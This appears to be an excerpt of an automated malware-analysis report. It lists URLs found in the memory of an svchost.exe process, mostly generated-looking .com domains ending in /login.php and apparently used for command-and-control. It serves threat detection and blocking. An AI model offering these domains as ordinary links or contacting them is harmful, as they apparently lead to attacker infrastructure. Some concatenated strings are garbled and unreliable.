Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyruc.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyzof.com/
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojybek.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojybim.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycec.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycec.com/H
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycec.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyduf.com/login.php
Source: svchost.exe, 00000002.00000003.1929704331.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1927868934.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947165935.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937315639.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1933122469.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojygym.com/login.php
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyjyc.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojykyf.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyrum.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyzik.com/
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybec.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1915969207.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybut.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volydyk.com/
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832918592.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822093505.0000000002F64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822071432.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816435063.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygyf.com/login.php
Source: svchost.exe, 00000002.00000003.1753426788.0000000008ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743948651.0000000008ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjok.com/H
Source: svchost.exe, 00000002.00000003.1753426788.0000000008ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743948651.0000000008ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjok.com/http://volyjok.com/
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjok.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjym.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volykek.com/login.php
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volykit.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volymaf.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypof.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypof.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyzic.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonybuk.com/H
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906280204.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonybuk.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonydem.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonydem.com/login.php
Source: svchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868461374.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1864780566.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonydik.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjef.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymoc.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymoc.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1837754876.0000000008ABD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844445717.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1863832827.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845150942.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845472203.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868778341.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845203467.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymuf.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypic.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypyf.com/
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypyf.com/login.php
Source: svchost.exe, 00000002.00000003.1889846604.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqym.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1882273113.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyrot.com/login.php
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752892568.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyryc.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyryk.com/login.php
Source: svchost.exe, 00000002.00000003.1943881239.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1341813350.0000000002F65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744793838.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940238200.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1361292804.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1342432511.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1341912346.00000000008A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzuf.com/login.php
Source: svchost.exe, 00000002.00000003.1929613840.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzut.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybok.com/
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1922202257.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920519032.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1922090654.0000000002F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybym.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycoc.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycyf.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopydum.com/
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766641.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878419703.0000000002F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopydum.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyjac.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyjac.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844445717.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1863832827.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845150942.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845472203.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868778341.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845203467.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopykak.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopykum.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopymit.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopymit.com/http://puvypoq.com/X;
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopymit.com/http://vopymit.com/http://vofyqek.com/http://vofyqek.com/http://vojyzik.com/http:
Source: svchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873699539.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868461374.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1864780566.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopymyc.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766641.0000000002F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopypec.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqef.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrik.com/
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzuc.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowybyc.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowycok.com/login.php
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871323500.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowycut.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906280204.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyjak.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowykuc.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowymom.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1901770860.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowymom.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowypek.com/login.php
Source: svchost.exe, 00000002.00000003.1936983553.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyqik.com/login.php
Source: svchost.exe, 00000002.00000003.1936983553.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyqik.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyqyt.com/H
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyqyt.com/http://vopyrik.com/http://vowyqyt.com/http://qebyhag.com/http://lykyvyx.com/H
Source: svchost.exe, 00000002.00000003.1889846604.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrif.com/login.php
